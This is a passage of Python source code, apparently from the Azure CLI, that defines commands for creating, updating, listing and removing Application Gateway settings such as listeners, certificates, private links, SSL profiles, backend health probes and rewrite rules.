"[resourceId('Microsoft.Network/applicationGateways', '{}')]".format(
application_gateway_name))
master_template.add_resource(app_gateway_resource)
master_template.add_output('applicationGateway', application_gateway_name, output_type='object')
if cert_password:
master_template.add_secure_parameter('certPassword', cert_password)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'ag_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_application_gateway(cmd, instance, sku=None, capacity=None, tags=None, enable_http2=None, min_capacity=None,
custom_error_pages=None, max_capacity=None):
if sku is not None:
instance.sku.tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
try:
if min_capacity is not None:
instance.autoscale_configuration.min_capacity = min_capacity
if max_capacity is not None:
instance.autoscale_configuration.max_capacity = max_capacity
except AttributeError:
instance.autoscale_configuration = {
'min_capacity': min_capacity,
'max_capacity': max_capacity
}
with cmd.update_context(instance) as c:
c.set_param('sku.name', sku)
c.set_param('sku.capacity', capacity)
c.set_param('tags', tags)
c.set_param('enable_http2', enable_http2)
c.set_param('custom_error_configurations', custom_error_pages)
return instance
def create_ag_authentication_certificate(cmd, resource_group_name, application_gateway_name, item_name,
cert_data, no_wait=False):
AuthCert = cmd.get_models('ApplicationGatewayAuthenticationCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_cert = AuthCert(data=cert_data, name=item_name)
upsert_to_collection(ag, 'authentication_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_authentication_certificate(instance, parent, item_name, cert_data):
instance.data = cert_data
return parent
def create_ag_backend_address_pool(cmd, resource_group_name, application_gateway_name, item_name,
servers=None, no_wait=False):
ApplicationGatewayBackendAddressPool = cmd.get_models('ApplicationGatewayBackendAddressPool')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_pool = ApplicationGatewayBackendAddressPool(name=item_name, backend_addresses=servers)
upsert_to_collection(ag, 'backend_address_pools', new_pool, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_address_pool(instance, parent, item_name, servers=None):
if servers is not None:
instance.backend_addresses = servers
return parent
def create_ag_frontend_ip_configuration(cmd, resource_group_name, application_gateway_name, item_name,
public_ip_address=None, subnet=None,
virtual_network_name=None, private_ip_address=None,
private_ip_address_allocation=None, no_wait=False):
ApplicationGatewayFrontendIPConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayFrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if public_ip_address:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address))
else:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address if private_ip_address else None,
private_ip_allocation_method='Static' if private_ip_address else 'Dynamic',
subnet=SubResource(id=subnet))
upsert_to_collection(ag, 'frontend_ip_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_ip_configuration(cmd, instance, parent, item_name, public_ip_address=None,
subnet=None, virtual_network_name=None,
private_ip_address=None):
SubResource = cmd.get_models('SubResource')
if public_ip_address is not None:
instance.public_ip_address = SubResource(id=public_ip_address)
if subnet is not None:
instance.subnet = SubResource(id=subnet)
if private_ip_address is not None:
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'Static'
return parent
def create_ag_frontend_port(cmd, resource_group_name, application_gateway_name, item_name, port,
no_wait=False):
ApplicationGatewayFrontendPort = cmd.get_models('ApplicationGatewayFrontendPort')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_port = ApplicationGatewayFrontendPort(name=item_name, port=port)
upsert_to_collection(ag, 'frontend_ports', new_port, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_port(instance, parent, item_name, port=None):
if port is not None:
instance.port = port
return parent
def create_ag_http_listener(cmd, resource_group_name, application_gateway_name, item_name,
frontend_port, frontend_ip=None, host_name=None, ssl_cert=None,
ssl_profile_id=None, firewall_policy=None, no_wait=False, host_names=None):
ApplicationGatewayHttpListener, SubResource = cmd.get_models('ApplicationGatewayHttpListener', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not frontend_ip:
frontend_ip = _get_default_id(ag, 'frontend_ip_configurations', '--frontend-ip')
new_listener = ApplicationGatewayHttpListener(
name=item_name,
frontend_ip_configuration=SubResource(id=frontend_ip),
frontend_port=SubResource(id=frontend_port),
host_name=host_name,
require_server_name_indication=True if ssl_cert and host_name else None,
protocol='https' if ssl_cert else 'http',
ssl_certificate=SubResource(id=ssl_cert) if ssl_cert else None,
host_names=host_names
)
if cmd.supported_api_version(min_api='2019-09-01'):
new_listener.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
if cmd.supported_api_version(min_api='2020-06-01'):
new_listener.ssl_profile = SubResource(id=ssl_profile_id) if ssl_profile_id else None
upsert_to_collection(ag, 'http_listeners', new_listener, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_http_listener(cmd, instance, parent, item_name, frontend_ip=None, frontend_port=None,
host_name=None, ssl_cert=None, ssl_profile_id=None, firewall_policy=None, host_names=None):
SubResource = cmd.get_models('SubResource')
if frontend_ip is not None:
instance.frontend_ip_configuration = SubResource(id=frontend_ip)
if frontend_port is not None:
instance.frontend_port = SubResource(id=frontend_port)
if ssl_cert is not None:
if ssl_cert:
instance.ssl_certificate = SubResource(id=ssl_cert)
instance.protocol = 'Https'
else:
instance.ssl_certificate = None
instance.protocol = 'Http'
if host_name is not None:
instance.host_name = host_name or None
if cmd.supported_api_version(min_api='2019-09-01'):
if firewall_policy is not None:
instance.firewall_policy = SubResource(id=firewall_policy)
if cmd.supported_api_version(min_api='2020-06-01'):
if ssl_profile_id is not None:
instance.ssl_profile = SubResource(id=ssl_profile_id)
if host_names is not None:
instance.host_names = host_names or None
instance.require_server_name_indication = instance.host_name and instance.protocol.lower() == 'https'
return parent
def assign_ag_identity(cmd, resource_group_name, application_gateway_name,
user_assigned_identity, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity',
'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_indentity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_indentity_instance
identity_instance = ManagedServiceIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance
)
ag.identity = identity_instance
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def remove_ag_identity(cmd, resource_group_name, application_gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
logger.warning("This command will be ignored. The identity doesn't exist.")
ag.identity = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_identity(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
raise CLIError("Please first use 'az network application-gateway identity assign` to init the identity.")
return ag.identity
def add_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
frontend_ip,
private_link_name,
private_link_subnet_name_or_id,
private_link_subnet_prefix=None,
private_link_primary=None,
private_link_ip_address=None,
no_wait=False):
(SubResource, IPAllocationMethod, Subnet,
ApplicationGatewayPrivateLinkConfiguration,
ApplicationGatewayPrivateLinkIpConfiguration) = cmd.get_models(
'SubResource', 'IPAllocationMethod', 'Subnet',
'ApplicationGatewayPrivateLinkConfiguration', 'ApplicationGatewayPrivateLinkIpConfiguration')
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
private_link_config_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=appgw.name,
child_type_1='privateLinkConfigurations',
child_name_1=private_link_name
)
if not any(fic for fic in appgw.frontend_ip_configurations if fic.name == frontend_ip):
raise CLIError("Frontend IP doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == private_link_config_id:
raise CLIError('Frontend IP already reference an existing Private Link')
if fic.name == frontend_ip:
break
else:
raise CLIError("Frontend IP doesn't exist")
if appgw.private_link_configurations is not None:
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
raise CLIError('Private Link name duplicates')
# get the virtual network of this application gateway
vnet_name = parse_resource_id(appgw.gateway_ip_configurations[0].subnet.id)['name']
vnet = ncf.virtual_networks.get(resource_group_name, vnet_name)
# prepare the subnet for new private link
for subnet in vnet.subnets:
if subnet.name == private_link_subnet_name_or_id:
raise CLIError('Subnet duplicates')
if subnet.address_prefix == private_link_subnet_prefix:
raise CLIError('Subnet prefix duplicates')
if subnet.address_prefixes and private_link_subnet_prefix in subnet.address_prefixes:
raise CLIError('Subnet prefix duplicates')
if is_valid_resource_id(private_link_subnet_name_or_id):
private_link_subnet_id = private_link_subnet_name_or_id
else:
private_link_subnet = Subnet(name=private_link_subnet_name_or_id,
address_prefix=private_link_subnet_prefix,
private_link_service_network_policies='Disabled')
private_link_subnet_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_name,
child_type_1='subnets',
child_name_1=private_link_subnet_name_or_id
)
vnet.subnets.append(private_link_subnet)
ncf.virtual_networks.begin_create_or_update(resource_group_name, vnet_name, vnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name='PrivateLinkDefaultIPConfiguration',
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
private_link_config = ApplicationGatewayPrivateLinkConfiguration(
name=private_link_name,
ip_configurations=[private_link_ip_config]
)
# associate the private link with the frontend IP configuration
for fic in appgw.frontend_ip_configurations:
if fic.name == frontend_ip:
fic.private_link_configuration = SubResource(id=private_link_config_id)
if appgw.private_link_configurations is None:
appgw.private_link_configurations = []
appgw.private_link_configurations.append(private_link_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name, appgw)
def show_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link
def list_ag_private_link(cmd,
resource_group_name,
application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.private_link_configurations
def remove_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
removed_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
removed_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == removed_private_link.id:
fic.private_link_configuration = None
# the left vnet have to delete manually
# rs = parse_resource_id(removed_private_link.ip_configurations[0].subnet.id)
# vnet_resource_group, vnet_name, subnet = rs['resource_group'], rs['name'], rs['child_name_1']
# ncf.subnets.delete(vnet_resource_group, vnet_name, subnet)
appgw.private_link_configurations.remove(removed_private_link)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
# region application-gateway trusted-client-certificates
def add_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
ApplicationGatewayTrustedClientCertificate = cmd.get_models('ApplicationGatewayTrustedClientCertificate')
cert = ApplicationGatewayTrustedClientCertificate(name=client_cert_name, data=client_cert_data)
appgw.trusted_client_certificates.append(cert)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
cert.data = client_cert_data
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_trusted_client_certificate(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.trusted_client_certificates
def remove_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
appgw.trusted_client_certificates.remove(cert)
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
instance = cert
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return instance
def show_ag_backend_health(cmd, client, resource_group_name, application_gateway_name, expand=None,
protocol=None, host=None, path=None, timeout=None, host_name_from_http_settings=None,
match_body=None, match_status_codes=None, address_pool=None, http_settings=None):
from azure.cli.core.commands import LongRunningOperation
on_demand_arguments = {protocol, host, path, timeout, host_name_from_http_settings, match_body, match_status_codes,
address_pool, http_settings}
if on_demand_arguments.difference({None}) and cmd.supported_api_version(min_api='2019-04-01'):
SubResource, ApplicationGatewayOnDemandProbe, ApplicationGatewayProbeHealthResponseMatch = cmd.get_models(
"SubResource", "ApplicationGatewayOnDemandProbe", "ApplicationGatewayProbeHealthResponseMatch")
probe_request = ApplicationGatewayOnDemandProbe(
protocol=protocol,
host=host,
path=path,
timeout=timeout,
pick_host_name_from_backend_http_settings=host_name_from_http_settings
)
if match_body is not None or match_status_codes is not None:
probe_request.match = ApplicationGatewayProbeHealthResponseMatch(
body=match_body,
status_codes=match_status_codes,
)
if address_pool is not None:
if not is_valid_resource_id(address_pool):
address_pool = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendAddressPools',
child_name_1=address_pool
)
probe_request.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
if not is_valid_resource_id(http_settings):
http_settings = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendHttpSettingsCollection',
child_name_1=http_settings
)
probe_request.backend_http_settings = SubResource(id=http_settings)
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health_on_demand(
resource_group_name, application_gateway_name, probe_request, expand))
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health(
resource_group_name, application_gateway_name, expand))
# endregion
# region application-gateway ssl-profile
def add_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
(SubResource,
ApplicationGatewaySslPolicy,
ApplicationGatewayClientAuthConfiguration,
ApplicationGatewaySslProfile) = cmd.get_models('SubResource',
'ApplicationGatewaySslPolicy',
'ApplicationGatewayClientAuthConfiguration',
'ApplicationGatewaySslProfile')
sr_trusted_client_certificates = [SubResource(id=item) for item in
trusted_client_certificates] if trusted_client_certificates else None
ssl_policy = ApplicationGatewaySslPolicy(policy_name=policy_name, policy_type=policy_type,
min_protocol_version=min_protocol_version,
cipher_suites=cipher_suites, disabled_ssl_protocols=disabled_ssl_protocols)
client_auth = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=client_auth_configuration) if client_auth_configuration else None
ssl_profile = ApplicationGatewaySslProfile(trusted_client_certificates=sr_trusted_client_certificates,
ssl_policy=ssl_policy, client_auth_configuration=client_auth,
name=ssl_profile_name)
appgw.ssl_profiles.append(ssl_profile)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
if policy_name is not None:
instance.ssl_policy.policy_name = policy_name
if policy_type is not None:
instance.ssl_policy.policy_type = policy_type
if min_protocol_version is not None:
instance.ssl_policy.min_protocol_version = min_protocol_version
if cipher_suites is not None:
instance.ssl_policy.cipher_suites = cipher_suites
if disabled_ssl_protocols is not None:
instance.ssl_policy.disabled_ssl_protocols = disabled_ssl_protocols
if trusted_client_certificates is not None:
SubResource = cmd.get_models('SubResource')
instance.trusted_client_certificates = [SubResource(id=item) for item in trusted_client_certificates]
if client_auth_configuration is not None:
ApplicationGatewayClientAuthConfiguration = cmd.get_models('ApplicationGatewayClientAuthConfiguration')
instance.client_auth_configuration = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=(client_auth_configuration == 'True')
)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_ssl_profile(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.ssl_profiles
def remove_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
appgw.ssl_profiles.remove(profile)
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return instance
# endregion
def add_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
private_link_primary=False,
private_link_ip_address=None,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
(SubResource, IPAllocationMethod,
ApplicationGatewayPrivateLinkIpConfiguration) = \
cmd.get_models('SubResource', 'IPAllocationMethod',
'ApplicationGatewayPrivateLinkIpConfiguration')
private_link_subnet_id = target_private_link.ip_configurations[0].subnet.id
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name=private_link_ip_name,
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
target_private_link.ip_configurations.append(private_link_ip_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def show_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
target_private_link_ip_config = None
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
target_private_link_ip_config = pic
break
else:
raise CLIError("IP Configuration doesn't exist")
return target_private_link_ip_config
def list_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link.ip_configurations
def remove_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
updated_ip_configurations = target_private_link.ip_configurations
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
updated_ip_configurations.remove(pic)
break
else:
raise CLIError("IP Configuration doesn't exist")
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def create_ag_backend_http_settings_collection(cmd, resource_group_name, application_gateway_name, item_name, port,
probe=None, protocol='http', cookie_based_affinity=None, timeout=None,
no_wait=False, connection_draining_timeout=0,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
ApplicationGatewayBackendHttpSettings, ApplicationGatewayConnectionDraining, SubResource = cmd.get_models(
'ApplicationGatewayBackendHttpSettings', 'ApplicationGatewayConnectionDraining', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_settings = ApplicationGatewayBackendHttpSettings(
port=port,
protocol=protocol,
cookie_based_affinity=cookie_based_affinity or 'Disabled',
request_timeout=timeout,
probe=SubResource(id=probe) if probe else None,
name=item_name)
if cmd.supported_api_version(min_api='2016-09-01'):
new_settings.authentication_certificates = [SubResource(id=x) for x in auth_certs or []]
if cmd.supported_api_version(min_api='2016-12-01'):
new_settings.connection_draining = \
ApplicationGatewayConnectionDraining(
enabled=bool(connection_draining_timeout), drain_timeout_in_sec=connection_draining_timeout or 1)
if cmd.supported_api_version(min_api='2017-06-01'):
new_settings.host_name = host_name
new_settings.pick_host_name_from_backend_address = host_name_from_backend_pool
new_settings.affinity_cookie_name = affinity_cookie_name
new_settings.probe_enabled = enable_probe
new_settings.path = path
if cmd.supported_api_version(min_api='2019-04-01'):
new_settings.trusted_root_certificates = [SubResource(id=x) for x in root_certs or []]
upsert_to_collection(ag, 'backend_http_settings_collection', new_settings, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_http_settings_collection(cmd, instance, parent, item_name, port=None, probe=None, protocol=None,
cookie_based_affinity=None, timeout=None,
connection_draining_timeout=None,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
SubResource = cmd.get_models('SubResource')
if auth_certs == "":
instance.authentication_certificates = None
elif auth_certs is not None:
instance.authentication_certificates = [SubResource(id=x) for x in auth_certs]
if root_certs == "":
instance.trusted_root_certificates = None
elif root_certs is not None:
instance.trusted_root_certificates = [SubResource(id=x) for x in root_certs]
if port is not None:
instance.port = port
if probe is not None:
instance.probe = SubResource(id=probe)
if protocol is not None:
instance.protocol = protocol
if cookie_based_affinity is not None:
instance.cookie_based_affinity = cookie_based_affinity
if timeout is not None:
instance.request_timeout = timeout
if connection_draining_timeout is not None:
instance.connection_draining = {
'enabled': bool(connection_draining_timeout),
'drain_timeout_in_sec': connection_draining_timeout or 1
}
if host_name is not None:
instance.host_name = host_name
if host_name_from_backend_pool is not None:
instance.pick_host_name_from_backend_address = host_name_from_backend_pool
if affinity_cookie_name is not None:
instance.affinity_cookie_name = affinity_cookie_name
if enable_probe is not None:
instance.probe_enabled = enable_probe
if path is not None:
instance.path = path
return parent
def create_ag_redirect_configuration(cmd, resource_group_name, application_gateway_name, item_name, redirect_type,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, no_wait=False):
ApplicationGatewayRedirectConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayRedirectConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_config = ApplicationGatewayRedirectConfiguration(
name=item_name,
redirect_type=redirect_type,
target_listener=SubResource(id=target_listener) if target_listener else None,
target_url=target_url,
include_path=include_path,
include_query_string=include_query_string)
upsert_to_collection(ag, 'redirect_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_redirect_configuration(cmd, instance, parent, item_name, redirect_type=None,
target_listener=None, target_url=None, include_path=None,
include_query_string=None, raw=False):
SubResource = cmd.get_models('SubResource')
if redirect_type:
instance.redirect_type = redirect_type
if target_listener:
instance.target_listener = SubResource(id=target_listener)
instance.target_url = None
if target_url:
instance.target_listener = None
instance.target_url = target_url
if include_path is not None:
instance.include_path = include_path
if include_query_string is not None:
instance.include_query_string = include_query_string
return parent
def create_ag_rewrite_rule_set(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False):
ApplicationGatewayRewriteRuleSet = cmd.get_models(
'ApplicationGatewayRewriteRuleSet')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_set = ApplicationGatewayRewriteRuleSet(name=item_name)
upsert_to_collection(ag, 'rewrite_rule_sets', new_set, 'name')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, item_name,
path='rewrite_rule_sets', key_path='name')
def update_ag_rewrite_rule_set(instance, parent, item_name):
return parent
def create_ag_rewrite_rule(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name,
sequence=None, request_headers=None, response_headers=None, no_wait=False,
modified_path=None, modified_query_string=None, enable_reroute=None):
(ApplicationGatewayRewriteRule,
ApplicationGatewayRewriteRuleActionSet,
ApplicationGatewayUrlConfiguration) = cmd.get_models('ApplicationGatewayRewriteRule',
'ApplicationGatewayRewriteRuleActionSet',
'ApplicationGatewayUrlConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
rule_set = find_child_item(ag, rule_set_name,
path='rewrite_rule_sets', key_path='name')
url_configuration = None
if any([modified_path, modified_query_string, enable_reroute]):
url_configuration = ApplicationGatewayUrlConfiguration(modified_path=modified_path,
modified_query_string=modified_query_string,
reroute=enable_reroute)
